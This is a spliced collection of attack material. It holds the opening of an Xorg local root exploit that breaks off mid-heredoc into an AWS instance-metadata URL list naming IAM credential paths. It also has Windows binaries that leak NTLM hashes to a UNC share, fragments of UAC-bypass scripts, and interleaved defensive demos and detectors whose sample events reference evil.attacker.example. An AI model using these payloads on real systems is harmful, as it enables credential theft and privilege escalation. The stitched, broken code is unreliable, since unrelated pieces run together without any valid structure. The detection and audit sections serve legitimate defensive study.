#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
# user-data is a single opaque blob; there is no iam/ path beneath it, IAM credentials live only under meta-data/
# on an IMDSv2-only instance every GET must carry X-aws-ec2-metadata-token, obtained with a PUT to /latest/api/token
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/meta-data/iam/security-credentials/   (lists the attached role name)
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
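Added example, not part of the gist: the request flow behind the credential paths listed above, run against a fake metadata service on 127.0.0.1 instead of 169.254.169.254. The fake runs in two modes, IMDSv1 (a plain GET works, which is all a GET-only SSRF gives you) and IMDSv2 (a session token from a PUT to /latest/api/token must accompany every GET). The role name, credential values and hostname are constructed for the demo.

```python
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed values for the demo; none of these are real.
FAKE_ROLE = "demo-instance-role"
FAKE_CREDS = {"AccessKeyId": "ASIAEXAMPLE", "SecretAccessKey": "example-secret",
              "Token": "example-session-token"}
FAKE_TOKEN = "constructed-imdsv2-token"
TOKEN_HDR = "X-aws-ec2-metadata-token"
TTL_HDR = "X-aws-ec2-metadata-token-ttl-seconds"

# Laid out like the real service: the credentials directory lists role names
# and each role name is a leaf holding the JSON credentials.
ROUTES = {
    "/latest/meta-data/iam/security-credentials/": FAKE_ROLE,
    "/latest/meta-data/iam/security-credentials/" + FAKE_ROLE: json.dumps(FAKE_CREDS),
}
# Ignore any http_proxy in the environment so 127.0.0.1 is reached directly.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def make_handler(require_token):
    class FakeIMDS(BaseHTTPRequestHandler):
        def log_message(self, *args):   # keep the demo quiet
            pass

        def do_PUT(self):
            # A token is only issued to a PUT that carries the TTL header.
            if self.path == "/latest/api/token" and TTL_HDR in self.headers:
                self._reply(200, FAKE_TOKEN)
            else:
                self._reply(400, "bad request")

        def do_GET(self):
            if require_token and self.headers.get(TOKEN_HDR) != FAKE_TOKEN:
                self._reply(401, "unauthorized")    # IMDSv2-only instance
            elif self.path in ROUTES:
                self._reply(200, ROUTES[self.path])
            else:
                self._reply(404, "not found")

        def _reply(self, code, body):
            data = body.encode()
            self.send_response(code)
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)
    return FakeIMDS


def start_fake_imds(require_token):
    srv = HTTPServer(("127.0.0.1", 0), make_handler(require_token))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_port


def imds_get(base, path, token=None):
    """GET a metadata path, adding the IMDSv2 header when a token is given.
    Returns (status, body); a refused request is reported, not raised."""
    req = urllib.request.Request(base + path)
    if token:
        req.add_header(TOKEN_HDR, token)
    try:
        with OPENER.open(req, timeout=2) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def imds_token(base, ttl=21600):
    """IMDSv2 step 1: PUT /latest/api/token with the TTL header."""
    req = urllib.request.Request(base + "/latest/api/token", method="PUT")
    req.add_header(TTL_HDR, str(ttl))
    with OPENER.open(req, timeout=2) as resp:
        return resp.read().decode()


def steal_role_creds(base, token=None):
    """The two-step walk behind the '[ROLE NAME]' placeholder: list the role
    names, then fetch the chosen role's credentials.  None if refused."""
    status, role = imds_get(base, "/latest/meta-data/iam/security-credentials/", token)
    if status != 200:
        return None
    status, body = imds_get(base, "/latest/meta-data/iam/security-credentials/" + role.strip(), token)
    return json.loads(body) if status == 200 else None


def demo():
    """Run both modes; shows what a GET-only SSRF and a token-capable client get."""
    out = {}
    for mode in ("v1", "v2"):
        srv, base = start_fake_imds(require_token=(mode == "v2"))
        out[mode + "_plain_get"] = steal_role_creds(base)
        out[mode + "_with_token"] = steal_role_creds(base, imds_token(base))
        srv.shutdown()
    return out


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The v2 run returns nothing for the plain GET and the full credential JSON once the token is sent, which is why an SSRF that can only issue GETs, or cannot set request headers, stops working against instances with IMDSv2 enforced.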
Executables for Capturing Hashes (incomplete list)
(all binaries live in System32 on Windows 10; tested against impacket-smbserver run with -smb2support)
@0rbz_
attrib.exe \\host\share
bcdboot.exe \\host\share
bdeunlock.exe \\host\share
cacls.exe \\host\share
certreq.exe \\host\share (noisy, pops an error dialog)
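Added example, not part of the list above: the detection side of this technique, run over constructed process-creation events in a Sysmon Event ID 1 shape. The executable set is the (incomplete) list above; the allowlist of legitimate file servers is an assumption to replace with your own inventory. It flags any process handed a UNC path to a raw IP or an unlisted host, and still records one of the listed binaries pointed at an allowlisted host at low severity, since the same command line with a different host is the attack.

```python
import re
from pathlib import PureWindowsPath

# Binaries from the list above that will authenticate to any UNC path.
HASH_LEAKERS = {"attrib.exe", "bcdboot.exe", "bdeunlock.exe", "cacls.exe", "certreq.exe"}
# Assumed inventory of file servers clients are expected to talk to.
KNOWN_SHARE_HOSTS = {"fileserver01.corp.example", "dc01.corp.example"}

UNC_HOST_RE = re.compile(r'\\\\([^\\\s"]+)\\')     # host part of \\host\share
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed events in a Sysmon Event ID 1 (process creation) shape.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\attrib.exe",
     "CommandLine": r"attrib.exe \\10.10.14.3\share", "User": r"CORP\alice"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cacls.exe",
     "CommandLine": r"cacls.exe \\fileserver01.corp.example\public", "User": r"CORP\bob"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\bob\notes.txt", "User": r"CORP\bob"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r"certreq.exe \\evil.attacker.example\x", "User": r"CORP\carol"},
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"explorer.exe \\10.10.14.3\loot", "User": r"CORP\dave"},
]


def unc_hosts(command_line):
    """Every host referenced by a UNC path in a command line, lower-cased."""
    return [h.lower() for h in UNC_HOST_RE.findall(command_line)]


def classify(event):
    """Return a finding for a suspicious process-creation event, else None."""
    if event.get("EventID") != 1:
        return None
    image = PureWindowsPath(event["Image"]).name.lower()
    for host in unc_hosts(event.get("CommandLine", "")):
        if IPV4_RE.match(host):
            reason, severity = "raw IP", "high"
        elif host not in KNOWN_SHARE_HOSTS:
            reason, severity = "unlisted host", "high"
        elif image in HASH_LEAKERS:
            reason, severity = "allowlisted host", "low"
        else:
            continue                     # ordinary binary, known server
        if image in HASH_LEAKERS:
            reason = "hash-leaking binary to " + reason
        return {"user": event["User"], "image": image, "host": host,
                "reason": reason, "severity": severity}
    return None


def find_hash_leaks(events):
    return [f for f in map(classify, events) if f]


if __name__ == "__main__":
    for finding in find_hash_leaks(SAMPLE_EVENTS):
        print(finding)
```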
# -*- coding: utf-8 -*-
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html
'''
SilentCleanup has a "Highest" RunLevel, meaning the scheduled task is elevated to administrator without any prompting.
Its "Execute" action path also contains an environment variable (%windir%\system32\cleanmgr.exe), and per-user
environment variables are stored in the HKCU registry hive (HKCU\Environment), which the user can write to.
We can perform an AlwaysNotify UAC bypass by pointing the 'windir' environment variable at our own payload and
triggering it through the SilentCleanup scheduled task.
'''
from _winreg import *   # Python 2 module; on Python 3 this is winreg
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
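Added example, not the gist's code: an audit for the condition the gist exploits, applied to a scheduled task's XML definition. It checks that the principal's RunLevel is HighestAvailable and that an Exec action's Command still contains an unexpanded %VAR% that a user can shadow through HKCU\Environment; PATH is excluded because the user value is appended to the system one rather than replacing it. The two task definitions are constructed for the demo (the vulnerable one mirrors the SilentCleanup shape the gist describes); on a real host the input comes from `schtasks /query /xml /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup"`.

```python
import re
import xml.etree.ElementTree as ET

NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
ENV_REF_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
# PATH is merged (system then user) rather than replaced by a user-level value,
# so a per-user PATH cannot redirect a command the way %windir% can.
NOT_SHADOWABLE = {"PATH"}


def local(tag):
    """Strip the XML namespace so elements can be matched by local name."""
    return tag.rsplit("}", 1)[-1]


def audit_task_xml(xml_text):
    """Report the run level, every Exec command, and which %VAR% references a
    user could shadow via HKCU\\Environment.  'risky' is the combination the
    gist exploits: elevated run level plus a shadowable variable in the path."""
    root = ET.fromstring(xml_text)
    run_level = "LeastPrivilege"          # schema default when RunLevel is absent
    commands = []
    for el in root.iter():
        name = local(el.tag)
        if name == "RunLevel" and el.text:
            run_level = el.text.strip()
        elif name == "Command" and el.text:
            commands.append(el.text.strip())
    shadowable = sorted({v for c in commands for v in ENV_REF_RE.findall(c)
                         if v.upper() not in NOT_SHADOWABLE})
    return {"run_level": run_level, "commands": commands,
            "shadowable_vars": shadowable,
            "risky": run_level == "HighestAvailable" and bool(shadowable)}


# Constructed task XML in the shape of the SilentCleanup task the gist targets.
VULNERABLE_TASK = f"""<Task version="1.4" xmlns="{NS}">
  <Principals>
    <Principal id="Author">
      <GroupId>S-1-5-32-545</GroupId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\\system32\\cleanmgr.exe</Command>
      <Arguments>/autoclean /d %systemdrive%</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed hardened variant: same run level, but an absolute command path
# leaves nothing for a per-user environment variable to redirect.
HARDENED_TASK = f"""<Task version="1.4" xmlns="{NS}">
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Windows\\System32\\cleanmgr.exe</Command></Exec></Actions>
</Task>"""


if __name__ == "__main__":
    for label, xml_text in (("vulnerable", VULNERABLE_TASK), ("hardened", HARDENED_TASK)):
        print(label, audit_task_xml(xml_text))
```

Only the Command element is scanned: a variable in Arguments (the %systemdrive% above) changes what cleanmgr.exe is told to do, not which binary gets launched with the elevated token.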
# -*- coding: UTF-8 -*-
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum
# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)
# -*- coding: UTF-8 -*-
# All credits go to: https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum
# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)
# -*- coding: utf-8 -*-
# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :))
# This is truly an Always Notify UAC bypass, because it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION, we instead look for processes whose manifests have <autoElevate> set to true.
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
shell32 = WinDLL('shell32', use_last_error=True)
# -*- coding: utf-8 -*-
# All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation
'''
slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
On execution it reads HKCU\Software\Classes\exefile\shell\open.
Because that registry key is writable by the unprivileged user, an arbitrary executable can be substituted as the handler.
'''
from _winreg import *   # Python 2 module; on Python 3 this is winreg
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
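Added example, not the gist's code: a check for the artefact this hijack leaves behind. A clean profile has no HKCU\Software\Classes\exefile\shell\open\command key, so its presence under the user hive is the indicator. The code parses a .reg export of HKCU\Software\Classes (constructed below; on a host, `reg export HKCU\Software\Classes hkcu_classes.reg` writes one as UTF-16 with a BOM, so open it with encoding="utf-16") and reports every per-user shell\open\command override, generalising from exefile to any ProgID since the same per-user override works for other handlers. The payload path is constructed.

```python
import re

SECTION_RE = re.compile(r"^\[(.+)\]\s*$")
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
# Any per-user ProgID whose open verb is overridden, not only exefile.
HANDLER_RE = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\Classes\\([^\\]+)\\shell\\open\\command$", re.I)


def reg_unescape(s):
    """Undo .reg string escaping (backslash-escaped backslashes and quotes)."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Return {key: {value_name: data}} for a .reg export.  String data
    (quoted) is decoded; other value types are kept as raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "(Default)" if m.group(1) == "@" else reg_unescape(m.group(1)[1:-1])
            data = m.group(2)
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                data = reg_unescape(data[1:-1])
            keys[current][name] = data
    return keys


def find_user_handler_overrides(reg_text):
    """ProgIDs with a per-user shell\\open\\command, plus the command they run.
    A clean profile has none of these; each one is a candidate hijack."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        m = HANDLER_RE.match(key)
        if m:
            findings.append({"progid": m.group(1), "command": values.get("(Default)", "")})
    return findings


# Constructed export: a harmless per-user extension mapping next to the planted
# exefile verb the technique above relies on.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\.txt]
@="txtfile"

[HKEY_CURRENT_USER\Software\Classes\exefile]

[HKEY_CURRENT_USER\Software\Classes\exefile\shell]

[HKEY_CURRENT_USER\Software\Classes\exefile\shell\open]

[HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command]
@="C:\\Users\\bob\\AppData\\Local\\Temp\\payload.exe \"%1\""
'''


if __name__ == "__main__":
    for f in find_user_handler_overrides(SAMPLE_REG):
        print(f"{f['progid']}: {f['command']}")
```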
C:\Windows\System32\bthudtask.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\changepk.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\ComputerDefaults.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\dccw.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\dcomcnfg.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\DeviceEject.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\DeviceProperties.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\djoin.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\easinvoker.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\EASPolicyManagerBrokerHost.exe: <autoElevate>true</autoElevate>
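Added example, not the gist's code, serving both the autoElevate listing above and the earlier process-enumeration bypass that looks for manifests with autoElevate set: it locates the embedded manifest XML inside a binary's raw bytes (RT_MANIFEST is stored as plain UTF-8 text, so a byte search for the assembly element suffices without walking the resource directory), parses it, and reports autoElevate together with requestedExecutionLevel and uiAccess. Pointed at C:\Windows\System32 on a Windows host, scan_directory emits lines in the format of the list above. The two byte blobs are constructed stand-ins (an MZ stub plus a manifest), not real PE files.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

WINDOWS_SETTINGS_NS = "http://schemas.microsoft.com/SMI/2005/WindowsSettings"


def manifest_from_bytes(data):
    """Return the embedded manifest XML as text, or None if there is none."""
    start = data.find(b"<assembly")
    if start < 0:
        return None
    end = data.find(b"</assembly>", start)
    if end < 0:
        return None
    return data[start:end + len(b"</assembly>")].decode("utf-8", errors="replace")


def local(tag):
    """Strip the XML namespace so elements can be matched by local name."""
    return tag.rsplit("}", 1)[-1]


def classify_manifest(xml_text):
    """Extract the elevation-relevant settings.  Matching by local name covers
    both the asm.v2 and asm.v3 trustInfo namespace variants seen in the wild."""
    root = ET.fromstring(xml_text)
    info = {"autoElevate": False, "level": None, "uiAccess": False}
    for el in root.iter():
        name = local(el.tag)
        if name == "autoElevate" and el.text:
            info["autoElevate"] = el.text.strip().lower() == "true"
        elif name == "requestedExecutionLevel":
            info["level"] = el.get("level")
            info["uiAccess"] = (el.get("uiAccess") or "false").lower() == "true"
    return info


def scan_binary(path):
    """Classify one file on disk; None when it carries no manifest."""
    xml_text = manifest_from_bytes(Path(path).read_bytes())
    return classify_manifest(xml_text) if xml_text else None


def report_line(path, info):
    """One line in the format of the list above."""
    flag = "true" if info["autoElevate"] else "false"
    return f"{path}: <autoElevate>{flag}</autoElevate>"


def scan_directory(directory):
    """Yield a report line for every auto-elevating *.exe under a directory."""
    for path in sorted(Path(directory).glob("*.exe")):
        try:
            info = scan_binary(path)
        except (OSError, ET.ParseError):
            continue
        if info and info["autoElevate"]:
            yield report_line(path, info)


def make_fake_pe(auto_elevate, level):
    """Constructed stand-in for an executable: an MZ stub, filler, then a manifest."""
    flag = "true" if auto_elevate else "false"
    manifest = f"""<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security><requestedPrivileges>
      <requestedExecutionLevel level="{level}" uiAccess="false"/>
    </requestedPrivileges></security>
  </trustInfo>
  <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
    <asmv3:windowsSettings xmlns="{WINDOWS_SETTINGS_NS}">
      <autoElevate>{flag}</autoElevate>
    </asmv3:windowsSettings>
  </asmv3:application>
</assembly>"""
    return (b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.\x00"
            + manifest.encode() + b"\x00" * 8)


if __name__ == "__main__":
    for name, blob in (("constructed-autoelevate.exe", make_fake_pe(True, "requireAdministrator")),
                       ("constructed-plain.exe", make_fake_pe(False, "asInvoker"))):
        print(report_line(name, classify_manifest(manifest_from_bytes(blob))))
```

autoElevate only has effect on binaries that are Microsoft-signed and live in a trusted directory such as System32; a hit from scan_directory on anything else is a misconfigured manifest, not an elevation path.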
# -*- coding: UTF-8 -*-
import enum, os, sys
# https://twitter.com/highsenburger69
from ctypes.wintypes import *
from ctypes import *
# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
shell32 = WinDLL('shell32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)